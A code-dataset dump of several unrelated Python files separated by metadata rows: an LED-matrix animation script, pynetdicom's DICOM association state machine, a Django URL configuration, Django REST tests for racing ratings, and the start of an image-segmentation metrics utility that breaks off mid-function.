Licensed under Creative Commons Attribution-Noncommercial-Share Alike 3.0
Unported License.
Press Ctrl+C to exit!
""")
# Configure the LED matrix: rotate the output and dim the brightness.
unicornhathd.rotation(90)
unicornhathd.brightness(0.6)
width, height = unicornhathd.get_shape()
# The sprite sheet sits next to this script.
img_file = os.path.join(os.path.dirname(__file__), 'lofi.png')
img = Image.open(img_file)
try:
    # Cycle forever over every width x height tile of the sprite sheet.
    while True:
        for o_x in range(int(img.size[0] / width)):
            for o_y in range(int(img.size[1] / height)):
                valid = False
                for x in range(width):
                    for y in range(height):
                        # NOTE(review): x and y are swapped between display
                        # coordinates and getpixel() — presumably to pair
                        # with rotation(90) above; confirm on hardware.
                        pixel = img.getpixel(((o_x * width) + y, (o_y * height) + x))
                        r, g, b = int(pixel[0]), int(pixel[1]), int(pixel[2])
                        if r or g or b:
                            valid = True
                        unicornhathd.set_pixel(x, y, r, g, b)
                # Only show (and pause on) tiles containing any lit pixel.
                if valid:
                    unicornhathd.show()
                    time.sleep(0.5)
except KeyboardInterrupt:
    # Blank the display on Ctrl+C so LEDs don't stay lit.
    unicornhathd.off()
|
[
"you@example.com"
] |
you@example.com
|
fd3eca812ddae876ca3d95e67b572793f2390c59
|
4fe440d600ba46a9133b06c3f9f0bd867734b24b
|
/source/netdicom/fsm.py
|
7cf74c368ead35a28485b93769f2881321e4c461
|
[
"MIT"
] |
permissive
|
stultus/pynetdicom-forked-from-official
|
921a365551d796201cd1b023e87ec4b82896de71
|
f6e9d670b339523fb6e77298289e865e8ad6530e
|
refs/heads/master
| 2020-04-09T10:19:01.967976
| 2014-11-19T08:42:05
| 2014-11-19T08:42:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,678
|
py
|
#
# Copyright (c) 2012 Patrice Munger
# This file is part of pynetdicom, released under a modified MIT license.
# See the file license.txt included with this distribution, also
# available at http://pynetdicom.googlecode.com
#
# Implementation of the OSI Upper Layer Services
# DICOM, Part 8, Section 7
import socket
import PDU
import time
import DULparameters
# Finite State machine action definitions
import logging
logger = logging.getLogger('netdicom.FSM')
# Association-establishment (AE) actions of the DICOM upper-layer state
# machine (DICOM Part 8, Section 7).
def AE_1(provider):
    """AE-1: open a TCP connection to the remote peer."""
    # Issue TRANSPORT CONNECT request primitive to local transport service
    provider.RemoteClientSocket = socket.socket(
        socket.AF_INET, socket.SOCK_STREAM)
    provider.RemoteClientSocket.connect(
        provider.primitive.CalledPresentationAddress)
def AE_2(provider):
    """AE-2: encode and send an A-ASSOCIATE-RQ PDU."""
    # Send A-ASSOCIATE-RQ PDU
    provider.pdu = PDU.A_ASSOCIATE_RQ_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
def AE_3(provider):
    """AE-3: deliver the accept confirmation to the service user."""
    # Issue A-ASSOCIATE confirmation (accept) primitive
    provider.ToServiceUser.put(provider.primitive)
def AE_4(provider):
    """AE-4: deliver the reject confirmation and close the connection."""
    # Issue A-ASSOCIATE confirmation (reject) primitive and close transport
    # connection
    provider.ToServiceUser.put(provider.primitive)
    provider.RemoteClientSocket.close()
    provider.RemoteClientSocket = None
def AE_5(provider):
    """AE-5: acknowledge the incoming connection and start the ARTIM timer."""
    # Issue connection response primitive start ARTIM timer
    # Don't need to send this primitive.
    provider.Timer.Start()
def AE_6(provider):
    """AE-6: stop ARTIM and, accepting the request, indicate it to the user."""
    # Stop ARTIM timer and if A-ASSOCIATE-RQ acceptable by service provider
    # - Issue A-ASSOCIATE indication primitive
    provider.Timer.Stop()
    # Accept
    provider.SM.NextState('Sta3')
    provider.ToServiceUser.put(provider.primitive)
    # otherwise????
def AE_7(provider):
    """AE-7: encode and send an A-ASSOCIATE-AC PDU."""
    # Send A-ASSOCIATE-AC PDU
    provider.pdu = PDU.A_ASSOCIATE_AC_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
def AE_8(provider):
    """AE-8: encode and send an A-ASSOCIATE-RJ PDU.

    NOTE(review): the standard pairs this action with starting the ARTIM
    timer (see the comment below), but no Timer.Start() call is present —
    confirm whether the timer is started elsewhere.
    """
    # Send A-ASSOCIATE-RJ PDU and start ARTIM timer
    provider.pdu = PDU.A_ASSOCIATE_RJ_PDU()
    # not sure about this ...
    if provider.primitive.Diagnostic is not None:
        provider.primitive.ResultSource = provider.primitive.Diagnostic.source
    #else:
    #    provider.primitive.Diagnostic = 1
    #    provider.primitive.ResultSource = 2
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
# Data-transfer (DT) actions of the DICOM upper-layer state machine.
def DT_1(provider):
    """DT-1: encode and send a P-DATA-TF PDU, consuming the primitive."""
    # Send P-DATA-TF PDU
    provider.pdu = PDU.P_DATA_TF_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.primitive = None
    provider.RemoteClientSocket.send(provider.pdu.Encode())
def DT_2(provider):
    """DT-2: deliver a P-DATA indication to the service user."""
    # Send P-DATA indication primitive
    provider.ToServiceUser.put(provider.primitive)
# Association-release (AR) actions of the DICOM upper-layer state machine.
def AR_1(provider):
    """AR-1: encode and send an A-RELEASE-RQ PDU."""
    # Send A-RELEASE-RQ PDU
    provider.pdu = PDU.A_RELEASE_RQ_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
def AR_2(provider):
    """AR-2: deliver an A-RELEASE indication to the service user."""
    # Send A-RELEASE indication primitive
    provider.ToServiceUser.put(provider.primitive)
def AR_3(provider):
    """AR-3: deliver the release confirmation and close the connection."""
    # Issue A-RELEASE confirmation primitive and close transport connection
    provider.ToServiceUser.put(provider.primitive)
    provider.RemoteClientSocket.close()
    provider.RemoteClientSocket = None
def AR_4(provider):
    """AR-4: send an A-RELEASE-RP PDU and start the ARTIM timer."""
    # Issue A-RELEASE-RP PDU and start ARTIM timer
    provider.pdu = PDU.A_RELEASE_RP_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
    provider.Timer.Start()
def AR_5(provider):
    """AR-5: stop the ARTIM timer."""
    # Stop ARTIM timer
    provider.Timer.Stop()
def AR_6(provider):
    """AR-6: deliver a P-DATA indication received during release."""
    # Issue P-DATA indication
    provider.ToServiceUser.put(provider.primitive)
def AR_7(provider):
    """AR-7: send a pending P-DATA-TF PDU during release."""
    # Issue P-DATA-TF PDU
    provider.pdu = PDU.P_DATA_TF_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
def AR_8(provider):
    """AR-8: handle a release collision; next state depends on who requested."""
    # Issue A-RELEASE indication (release collision)
    provider.ToServiceUser.put(provider.primitive)
    if provider.requestor == 1:
        provider.SM.NextState('Sta9')
    else:
        provider.SM.NextState('Sta10')
def AR_9(provider):
    """AR-9: encode and send an A-RELEASE-RP PDU."""
    # Send A-RELEASE-RP PDU
    provider.pdu = PDU.A_RELEASE_RP_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
def AR_10(provider):
    """AR-10: deliver the A-RELEASE confirmation to the service user."""
    # Issue A-RELEASE confirmation primitive
    provider.ToServiceUser.put(provider.primitive)
def AA_1(provider):
# Send A-ABORT PDU (service-user source) and start (or restart
# if already started) ARTIM timer.
provider.pdu = PDU.A_ABORT_PDU()
# CHECK THIS ...
provider.pdu.AbortSource = 1
provider.pdu.ReasonDiag = 0
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
provider.Timer.Restart()
def AA_2(provider):
# Stop ARTIM timer if running. Close transport connection.
provider.Timer.Stop()
provider.RemoteClientSocket.close()
provider.RemoteClientSocket = None
def AA_3(provider):
    """AA-3: deliver the abort indication and drop the transport connection.

    Triggered by reception of an A-ABORT PDU.  The queued primitive is the
    A-ABORT (service-user abort) or A-P-ABORT (provider abort) indication.
    """
    provider.ToServiceUser.put(provider.primitive)
    sock = provider.RemoteClientSocket
    sock.close()
    provider.RemoteClientSocket = None
def AA_4(provider):
    # Issue A-P-ABORT indication primitive.
    # AA-4: provider-initiated abort (e.g. transport closed unexpectedly);
    # a fresh A-ABORT service-parameters object replaces whatever primitive
    # was pending, then it is delivered to the local user.
    provider.primitive = DULparameters.A_ABORT_ServiceParameters()
    provider.ToServiceUser.put(provider.primitive)
def AA_5(provider):
    """AA-5: stop the ARTIM timer."""
    timer = provider.Timer
    timer.Stop()
def AA_6(provider):
    """AA-6: ignore the received PDU by discarding the pending primitive."""
    provider.primitive = None
def AA_7(provider):
    # Send A-ABORT PDU.
    # AA-7: build an A-ABORT PDU from the pending primitive and send it to
    # the peer over the open transport connection.
    provider.pdu = PDU.A_ABORT_PDU()
    provider.pdu.FromParams(provider.primitive)
    provider.RemoteClientSocket.send(provider.pdu.Encode())
def AA_8(provider):
    # Send A-ABORT PDU (service-provider source), issue and A-P-ABORT
    # indication, and start ARTIM timer.
    # Send A-ABORT PDU
    provider.pdu = PDU.A_ABORT_PDU()
    # NOTE(review): this sets `Source` while AA_1 sets `AbortSource` on the
    # same PDU class, and FromParams() is never called here — confirm which
    # attribute the encoder actually reads.
    provider.pdu.Source = 2
    provider.pdu.ReasonDiag = 0  # No reason given
    # Socket may already be gone (e.g. transport closed); only send if open.
    if provider.RemoteClientSocket:
        provider.RemoteClientSocket.send(provider.pdu.Encode())
    # Issue A-P-ABORT indication
    provider.ToServiceUser.put(provider.primitive)
    provider.Timer.Start()
# Finite State Machine
# states
# Human-readable names of the DICOM Upper Layer state machine states
# (PS3.8, Section 9.2.1, Table 9-1); keys are referenced by TransitionTable.
states = {
    # No association
    'Sta1': 'Idle',
    # Association establishment
    'Sta2': 'Transport Connection Open (Awaiting A-ASSOCIATE-RQ PDU)',
    'Sta3': 'Awaiting Local A-ASSOCIATE response primitive (from local user)',
    'Sta4': 'Awaiting transport connection opening to complete (from local '
            'transport service',
    'Sta5': 'Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU',
    # Data transfer
    'Sta6': 'Association established and ready for data transfer',
    # Association release
    'Sta7': 'Awaiting A-RELEASE-RP PDU',
    'Sta8': 'Awaiting local A-RELEASE response primitive (from local user)',
    'Sta9': 'Release collision requestor side; awaiting A-RELEASE response '
            ' (from local user)',
    'Sta10': 'Release collision acceptor side; awaiting A-RELEASE-RP PDU',
    'Sta11': 'Release collision requestor side; awaiting A-RELEASE-RP PDU',
    'Sta12': 'Release collision acceptor side; awaiting A-RELEASE response '
             'primitive (from local user)',
    'Sta13': 'Awaiting Transport Connection Close Indication (Association no '
             'longer exists)'
}
# actions
# Map of action name -> (description, handler function, resulting state(s)).
# A tuple of states means the handler selects the successor itself via
# StateMachine.NextState().
# FIX: 'AA-7' previously pointed at handler AA_6 ("ignore PDU"), so a PDU
# that required an A-ABORT answer in Sta13 was silently dropped instead of
# being aborted; it now uses AA_7, which actually sends the A-ABORT PDU.
actions = {
    # Association establishment actions
    'AE-1': ('Issue TransportConnect request primitive to local transport '
             'service', AE_1, 'Sta4'),
    'AE-2': ('Send A_ASSOCIATE-RQ PDU', AE_2, 'Sta5'),
    'AE-3': ('Issue A-ASSOCIATE confirmation (accept) primitive', AE_3,
             'Sta6'),
    'AE-4': ('Issue A-ASSOCIATE confirmation (reject) primitive and close '
             'transport connection', AE_4, 'Sta1'),
    'AE-5': ('Issue transport connection response primitive; start ARTIM '
             'timer', AE_5, 'Sta2'),
    'AE-6': ('Check A-ASSOCIATE-RQ', AE_6, ('Sta3', 'Sta13')),
    'AE-7': ('Send A-ASSOCIATE-AC PDU', AE_7, 'Sta6'),
    'AE-8': ('Send A-ASSOCIATE-RJ PDU', AE_8, 'Sta13'),
    # Data transfer related actions
    'DT-1': ('Send P-DATA-TF PDU', DT_1, 'Sta6'),
    'DT-2': ('Send P-DATA indication primitive', DT_2, 'Sta6'),
    # Assocation Release related actions
    'AR-1': ('Send A-RELEASE-RQ PDU', AR_1, 'Sta7'),
    'AR-2': ('Send A-RELEASE indication primitive', AR_2, 'Sta8'),
    'AR-3': ('Issue A-RELEASE confirmation primitive and close transport '
             'connection', AR_3, 'Sta1'),
    'AR-4': ('Issue A-RELEASE-RP PDU and start ARTIM timer', AR_4, 'Sta13'),
    'AR-5': ('Stop ARTIM timer', AR_5, 'Sta1'),
    'AR-6': ('Issue P-DATA indication', AR_6, 'Sta7'),
    'AR-7': ('Issue P-DATA-TF PDU', AR_7, 'Sta8'),
    'AR-8': ('Issue A-RELEASE indication (release collision)', AR_8,
             ('Sta9', 'Sta10')),
    'AR-9': ('Send A-RELEASE-RP PDU', AR_9, 'Sta11'),
    'AR-10': ('Issue A-RELEASE confimation primitive', AR_10, 'Sta12'),
    # Association abort related actions
    'AA-1': ('Send A-ABORT PDU (service-user source) and start (or restart) '
             'ARTIM timer', AA_1, 'Sta13'),
    'AA-2': ('Stop ARTIM timer if running. Close transport connection', AA_2,
             'Sta1'),
    'AA-3': ('Issue A-ABORT or A-P-ABORT indication and close transport '
             'connection', AA_3, 'Sta1'),
    'AA-4': ('Issue A-P-ABORT indication primitive', AA_4, 'Sta1'),
    'AA-5': ('Stop ARTIM timer', AA_5, 'Sta1'),
    'AA-6': ('Ignore PDU', AA_6, 'Sta13'),
    'AA-7': ('Send A-ABORT PDU', AA_7, 'Sta13'),
    'AA-8': ('Send A-ABORT PDU, issue an A-P-ABORT indication and start '
             'ARTIM timer', AA_8, 'Sta13')}
# events
# Human-readable names of the DUL state machine events (PS3.8, Table 9-10);
# EvtN keys are used by TransitionTable and for debug logging.
events = {
    'Evt1': "A-ASSOCIATE request (local user)",
    'Evt2': "Transport connect confirmation (local transport service)",
    'Evt3': "A-ASSOCIATE-AC PDU (received on transport connection)",
    'Evt4': "A-ASSOCIATE-RJ PDU (received on transport connection)",
    'Evt5': "Transport connection indication (local transport service)",
    'Evt6': "A-ASSOCIATE-RQ PDU (on tranport connection)",
    'Evt7': "A-ASSOCIATE response primitive (accept)",
    'Evt8': "A-ASSOCIATE response primitive (reject)",
    'Evt9': "P-DATA request primitive",
    'Evt10': "P-DATA-TF PDU (on transport connection)",
    'Evt11': "A-RELEASE request primitive",
    'Evt12': "A-RELEASE-RQ PDU (on transport)",
    'Evt13': "A-RELEASE-RP PDU (on transport)",
    'Evt14': "A-RELEASE response primitive",
    'Evt15': "A-ABORT request primitive",
    'Evt16': "A-ABORT PDU (on transport)",
    'Evt17': "Transport connection closed",
    'Evt18': "ARTIM timer expired (rej/rel)",
    'Evt19': "Unrecognized/invalid PDU"}
# Allowed transitions of the DUL state machine (PS3.8, Table 9-10):
# (event, current state) -> action name.  The successor state comes from the
# third element of the matching `actions` entry.  Pairs absent from this
# table are protocol violations and raise KeyError in StateMachine.Action.
TransitionTable = {
    # Evt1: A-ASSOCIATE request from the local user
    ('Evt1', 'Sta1'): 'AE-1',
    # Evt2: transport connect confirmation
    ('Evt2', 'Sta4'): 'AE-2',
    # Evt3: A-ASSOCIATE-AC PDU received
    ('Evt3', 'Sta2'): 'AA-1',
    ('Evt3', 'Sta3'): 'AA-8',
    ('Evt3', 'Sta5'): 'AE-3',
    ('Evt3', 'Sta6'): 'AA-8',
    ('Evt3', 'Sta7'): 'AA-8',
    ('Evt3', 'Sta8'): 'AA-8',
    ('Evt3', 'Sta9'): 'AA-8',
    ('Evt3', 'Sta10'): 'AA-8',
    ('Evt3', 'Sta11'): 'AA-8',
    ('Evt3', 'Sta12'): 'AA-8',
    ('Evt3', 'Sta13'): 'AA-6',
    # Evt4: A-ASSOCIATE-RJ PDU received
    ('Evt4', 'Sta2'): 'AA-1',
    ('Evt4', 'Sta3'): 'AA-8',
    ('Evt4', 'Sta5'): 'AE-4',
    ('Evt4', 'Sta6'): 'AA-8',
    ('Evt4', 'Sta7'): 'AA-8',
    ('Evt4', 'Sta8'): 'AA-8',
    ('Evt4', 'Sta9'): 'AA-8',
    ('Evt4', 'Sta10'): 'AA-8',
    ('Evt4', 'Sta11'): 'AA-8',
    ('Evt4', 'Sta12'): 'AA-8',
    ('Evt4', 'Sta13'): 'AA-6',
    # Evt5: incoming transport connection
    ('Evt5', 'Sta1'): 'AE-5',
    # Evt6: A-ASSOCIATE-RQ PDU received
    ('Evt6', 'Sta2'): 'AE-6',
    ('Evt6', 'Sta3'): 'AA-8',
    ('Evt6', 'Sta5'): 'AA-8',
    ('Evt6', 'Sta6'): 'AA-8',
    ('Evt6', 'Sta7'): 'AA-8',
    ('Evt6', 'Sta8'): 'AA-8',
    ('Evt6', 'Sta9'): 'AA-8',
    ('Evt6', 'Sta10'): 'AA-8',
    ('Evt6', 'Sta11'): 'AA-8',
    ('Evt6', 'Sta12'): 'AA-8',
    ('Evt6', 'Sta13'): 'AA-7',
    # Evt7/Evt8: local A-ASSOCIATE response (accept/reject)
    ('Evt7', 'Sta3'): 'AE-7',
    ('Evt8', 'Sta3'): 'AE-8',
    # Evt9: P-DATA request from the local user
    ('Evt9', 'Sta6'): 'DT-1',
    ('Evt9', 'Sta8'): 'AR-7',
    # Evt10: P-DATA-TF PDU received
    ('Evt10', 'Sta2'): 'AA-1',
    ('Evt10', 'Sta3'): 'AA-8',
    ('Evt10', 'Sta5'): 'AA-8',
    ('Evt10', 'Sta6'): 'DT-2',
    ('Evt10', 'Sta7'): 'AR-6',
    ('Evt10', 'Sta8'): 'AA-8',
    ('Evt10', 'Sta9'): 'AA-8',
    ('Evt10', 'Sta10'): 'AA-8',
    ('Evt10', 'Sta11'): 'AA-8',
    ('Evt10', 'Sta12'): 'AA-8',
    ('Evt10', 'Sta13'): 'AA-6',
    # Evt11: local A-RELEASE request
    ('Evt11', 'Sta6'): 'AR-1',
    # Evt12: A-RELEASE-RQ PDU received
    ('Evt12', 'Sta2'): 'AA-1',
    ('Evt12', 'Sta3'): 'AA-8',
    ('Evt12', 'Sta5'): 'AA-8',
    ('Evt12', 'Sta6'): 'AR-2',
    ('Evt12', 'Sta7'): 'AR-8',
    ('Evt12', 'Sta8'): 'AA-8',
    ('Evt12', 'Sta9'): 'AA-8',
    ('Evt12', 'Sta10'): 'AA-8',
    ('Evt12', 'Sta11'): 'AA-8',
    ('Evt12', 'Sta12'): 'AA-8',
    ('Evt12', 'Sta13'): 'AA-6',
    # Evt13: A-RELEASE-RP PDU received
    ('Evt13', 'Sta2'): 'AA-1',
    ('Evt13', 'Sta3'): 'AA-8',
    ('Evt13', 'Sta5'): 'AA-8',
    ('Evt13', 'Sta6'): 'AA-8',
    ('Evt13', 'Sta7'): 'AR-3',
    ('Evt13', 'Sta8'): 'AA-8',
    ('Evt13', 'Sta9'): 'AA-8',
    ('Evt13', 'Sta10'): 'AR-10',
    ('Evt13', 'Sta11'): 'AR-3',
    ('Evt13', 'Sta12'): 'AA-8',
    ('Evt13', 'Sta13'): 'AA-6',
    # Evt14: local A-RELEASE response
    ('Evt14', 'Sta8'): 'AR-4',
    ('Evt14', 'Sta9'): 'AR-9',
    ('Evt14', 'Sta12'): 'AR-4',
    # Evt15: local A-ABORT request
    ('Evt15', 'Sta3'): 'AA-1',
    ('Evt15', 'Sta4'): 'AA-2',
    ('Evt15', 'Sta5'): 'AA-1',
    ('Evt15', 'Sta6'): 'AA-1',
    ('Evt15', 'Sta7'): 'AA-1',
    ('Evt15', 'Sta8'): 'AA-1',
    ('Evt15', 'Sta9'): 'AA-1',
    ('Evt15', 'Sta10'): 'AA-1',
    ('Evt15', 'Sta11'): 'AA-1',
    ('Evt15', 'Sta12'): 'AA-1',
    # Evt16: A-ABORT PDU received
    ('Evt16', 'Sta2'): 'AA-2',
    ('Evt16', 'Sta3'): 'AA-3',
    ('Evt16', 'Sta5'): 'AA-3',
    ('Evt16', 'Sta6'): 'AA-3',
    ('Evt16', 'Sta7'): 'AA-3',
    ('Evt16', 'Sta8'): 'AA-3',
    ('Evt16', 'Sta9'): 'AA-3',
    ('Evt16', 'Sta10'): 'AA-3',
    ('Evt16', 'Sta11'): 'AA-3',
    ('Evt16', 'Sta12'): 'AA-3',
    ('Evt16', 'Sta13'): 'AA-2',
    # Evt17: transport connection closed
    ('Evt17', 'Sta2'): 'AA-5',
    ('Evt17', 'Sta3'): 'AA-4',
    ('Evt17', 'Sta4'): 'AA-4',
    ('Evt17', 'Sta5'): 'AA-4',
    ('Evt17', 'Sta6'): 'AA-4',
    ('Evt17', 'Sta7'): 'AA-4',
    ('Evt17', 'Sta8'): 'AA-4',
    ('Evt17', 'Sta9'): 'AA-4',
    ('Evt17', 'Sta10'): 'AA-4',
    ('Evt17', 'Sta11'): 'AA-4',
    ('Evt17', 'Sta12'): 'AA-4',
    ('Evt17', 'Sta13'): 'AR-5',
    # Evt18: ARTIM timer expired
    ('Evt18', 'Sta2'): 'AA-2',
    ('Evt18', 'Sta13'): 'AA-2',
    # Evt19: unrecognized or invalid PDU
    ('Evt19', 'Sta2'): 'AA-1',
    ('Evt19', 'Sta3'): 'AA-8',
    ('Evt19', 'Sta5'): 'AA-8',
    ('Evt19', 'Sta6'): 'AA-8',
    ('Evt19', 'Sta7'): 'AA-8',
    ('Evt19', 'Sta8'): 'AA-8',
    ('Evt19', 'Sta9'): 'AA-8',
    ('Evt19', 'Sta10'): 'AA-8',
    ('Evt19', 'Sta11'): 'AA-8',
    ('Evt19', 'Sta12'): 'AA-8',
    ('Evt19', 'Sta13'): 'AA-7'}
class StateMachine:
    """DICOM Upper Layer protocol finite state machine (PS3.8, Section 9.2).

    Tracks the current state name ('Sta1'..'Sta13'); for each incoming event
    it looks up the matching action in `TransitionTable` / `actions`, runs
    the handler, and advances to the successor state.
    """

    def __init__(self, provider):
        # 'Sta1' == Idle: no association, no transport connection.
        self.CurrentState = 'Sta1'
        self.provider = provider

    def Action(self, event, c):
        """Execute the action triggered by `event` in the current state.

        `c` is the DUL provider handed through to the action handler.
        Raises KeyError when (event, state) is not a legal transition.
        """
        try:
            action_name = TransitionTable[(event, self.CurrentState)]
        except KeyError:
            # Illegal (event, state) pair: log the context, then re-raise.
            # (The original also had an unreachable `return` after `raise`;
            # that dead statement has been removed.)
            logger.debug('%s: current state is: %s %s' %
                         (self.provider.name, self.CurrentState,
                          states[self.CurrentState]))
            logger.debug('%s: event: %s %s' %
                         (self.provider.name, event, events[event]))
            raise
        action = actions[action_name]
        logger.debug('')
        logger.debug('%s: current state is: %s %s' %
                     (self.provider.name, self.CurrentState,
                      states[self.CurrentState]))
        logger.debug('%s: event: %s %s' %
                     (self.provider.name, event, events[event]))
        logger.debug('%s: entering action: (%s, %s) %s %s' %
                     (self.provider.name, event, self.CurrentState,
                      action_name, actions[action_name][0]))
        # Run the handler; actions with a single successor state advance the
        # machine here, while multi-successor actions (tuple, e.g. AE-6,
        # AR-8) call NextState() themselves inside the handler.
        action[1](c)
        if not isinstance(action[2], tuple):
            self.CurrentState = action[2]
        logger.debug('%s: action complete. State is now %s %s' %
                     (self.provider.name, self.CurrentState,
                      states[self.CurrentState]))
        # NOTE(review): the original wrapped the body above in a bare
        # `try/except: raise` whose trailing `self.provider.Kill()` was
        # unreachable dead code; the no-op wrapper has been removed.  If
        # kill-on-failure was intended, Kill() must run *before* the raise.

    def NextState(self, state):
        """Force the machine into `state` (used by multi-successor actions)."""
        self.CurrentState = state
|
[
"hrishi.kb@gmail.com"
] |
hrishi.kb@gmail.com
|
86ceac536ce6d9ab5f58bc68e69c28ecf2be5b99
|
9676e901d4d81e963206ce292a8823e774a4273a
|
/my_app/urls.py
|
7c33b5b09b32c5e5e2280abc4e03a3efe425f9a1
|
[] |
no_license
|
zhoumo753/ttdjg
|
273a41bc6e1ec8611f089dc1362eb9e1af134694
|
5ad53c456e8fafbec92837669629798a2e36dbe0
|
refs/heads/master
| 2022-12-08T18:29:44.892142
| 2020-09-11T07:15:28
| 2020-09-11T07:15:28
| 294,616,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
from django.urls import path,include
from . import views
# URL routes for this app; each path maps onto a view in ./views.py.
urlpatterns = [
    path('grades/',views.grades),
    path('students/',views.students),
    path('geturl1',views.geturl1),
    # NOTE(review): view is named `showregist` while the route says
    # 'showregister/' — confirm the view function name is intentional.
    path('showregister/', views.showregist),
    path('showregister/register/', views.regist),
    path('redirect1/', views.redirect1),
    path('redirect2/', views.redirect2),
    path('showmain/',views.showmain),
    path('main/',views.main),
    path('login/',views.login),
    path('quit/',views.quit),
    # Site index served at the bare root URL.
    path('',views.index),
]
|
[
"1152081647@qq.com"
] |
1152081647@qq.com
|
87449d04887b5c41d56c5bb0801dda692a8c3d63
|
927a63ad2a514c9aea72e641634907d6f88121d6
|
/app/racing/tests/test_ratings_api.py
|
45f23086bf6c8762b8d1adfbea412ffecb5532f6
|
[
"MIT"
] |
permissive
|
bartisrichard/formula-one
|
ecc2534c3d8250048893fee9a76be79a37d7a1f4
|
de14da6b1dcbd09d3ed5685d3a4f2f4f7934d908
|
refs/heads/main
| 2023-07-19T03:59:29.098308
| 2021-08-22T13:03:54
| 2021-08-22T13:03:54
| 398,193,892
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,599
|
py
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Rating
from racing.serializers import RatingSerializer
RATINGS_URL = reverse('racing:rating-list')
class PublicRatingsApiTests(TestCase):
    """Tests for the ratings endpoint without authentication."""

    def setUp(self):
        # Fresh anonymous API client for every test case.
        self.client = APIClient()

    def test_login_required(self):
        """An unauthenticated GET on the ratings list must return 401."""
        response = self.client.get(RATINGS_URL)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRatingsAPITests(TestCase):
    # Tests for the ratings endpoint with an authenticated user.
    def setUp(self):
        # Authenticate a throwaway user so the endpoint does not 401.
        self.client = APIClient()
        self.user = get_user_model().objects.create_user(
            'test@acetech.dev',
            'testpass'
        )
        self.client.force_authenticate(self.user)
    def test_retrieve_rating_list(self):
        # Listing ratings returns the user's ratings serialized in
        # descending name order.
        Rating.objects.create(user=self.user, name='carlos_sainz_rating', overall=87, experience=69, racecraft=88, awareness=94, pace=85)
        Rating.objects.create(user=self.user, name='fernando_alonso_rating', overall=89, experience=99, racecraft=89, awareness=94, pace=86)
        res = self.client.get(RATINGS_URL)
        # NOTE(review): comparing against order_by('-name') assumes the API
        # returns that exact ordering — confirm the viewset's ordering.
        ratings = Rating.objects.all().order_by('-name')
        serializer = RatingSerializer(ratings, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, serializer.data)
    def test_ratings_limited_to_user(self):
        # A second user's rating must not appear in the first user's list.
        user2 = get_user_model().objects.create_user(
            'other@acetech.dev',
            'testpass'
        )
        Rating.objects.create(user=user2, name='carlos_sainz_rating', overall=87, experience=69, racecraft=88, awareness=94, pace=85)
        rating = Rating.objects.create(user=self.user, name='fernando_alonso_rating', overall=89, experience=99, racecraft=89, awareness=94, pace=86)
        res = self.client.get(RATINGS_URL)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data), 1)
        self.assertEqual(res.data[0]['name'], rating.name)
    # NOTE(review): the string below is leftover tutorial code (ingredient
    # tests) kept as a dead string literal; consider deleting it.
    """def test_create_ingredient_successful(self):
        payload = {'name': 'Cabbage'}
        self.client.post(INGREDIENTS_URL, payload)
        exists = Ingredient.objects.filter(
            user=self.user,
            name=payload['name']
        ).exists()
        self.assertTrue(exists)
    def test_create_ingredient_invalid(self):
        payload = {'name': ''}
        res = self.client.post(INGREDIENTS_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)"""
|
[
"88649875+bartisrichard@users.noreply.github.com"
] |
88649875+bartisrichard@users.noreply.github.com
|
8220824c53567575e26f018ed0478e637a696b5d
|
e196ace4119ad3eb71d75856763cfa90c0576ace
|
/task_driven_data_augmentation/f1_utils.py
|
591cc836c1d3db41a1767850ed40d9a463779c17
|
[] |
no_license
|
dpaolella/restoration-mapper
|
ba1304832aa2001514506f3a1cd79834030ba721
|
622e23d93216e577d3583f034c8ff7366394599a
|
refs/heads/master
| 2023-07-25T05:04:50.422122
| 2020-05-11T19:49:54
| 2020-05-11T19:49:54
| 250,290,582
| 0
| 5
| null | 2023-07-06T21:27:41
| 2020-03-26T15:04:43
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 19,533
|
py
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import f1_score
import nibabel as nib
#to make directories
import pathlib
from skimage import transform
from scipy.ndimage import morphology
from array2gif import write_gif
class f1_utilsObj:
    def __init__(self,cfg,dt):
        """Cache image/segmentation settings from the config object `cfg`
        and keep a reference to the data-loader helper `dt`."""
        #print('f1 utils init')
        self.img_size_x=cfg.img_size_x
        self.img_size_y=cfg.img_size_y
        self.batch_size=cfg.batch_size
        self.num_classes=cfg.num_classes
        self.num_channels=cfg.num_channels
        self.interp_val = cfg.interp_val
        self.target_resolution=cfg.target_resolution
        self.data_path_tr=cfg.data_path_tr
        # data-loader helper; preprocess_data() is used at inference time
        self.dt=dt
def surfd(self,input1, input2, sampling=1, connectivity=1):
'''
function to compute the surface distance
input params:
input1: predicted segmentation mask
input2: ground truth mask
sampling: default value
connectivity: default value
returns:
sds : surface distance
'''
input_1 = np.atleast_1d(input1.astype(np.bool))
input_2 = np.atleast_1d(input2.astype(np.bool))
conn = morphology.generate_binary_structure(input_1.ndim, connectivity)
#binary erosion on input1
y=morphology.binary_erosion(input_1, conn)
y=y.astype(np.float32)
x=input_1.astype(np.float32)
S=x-y
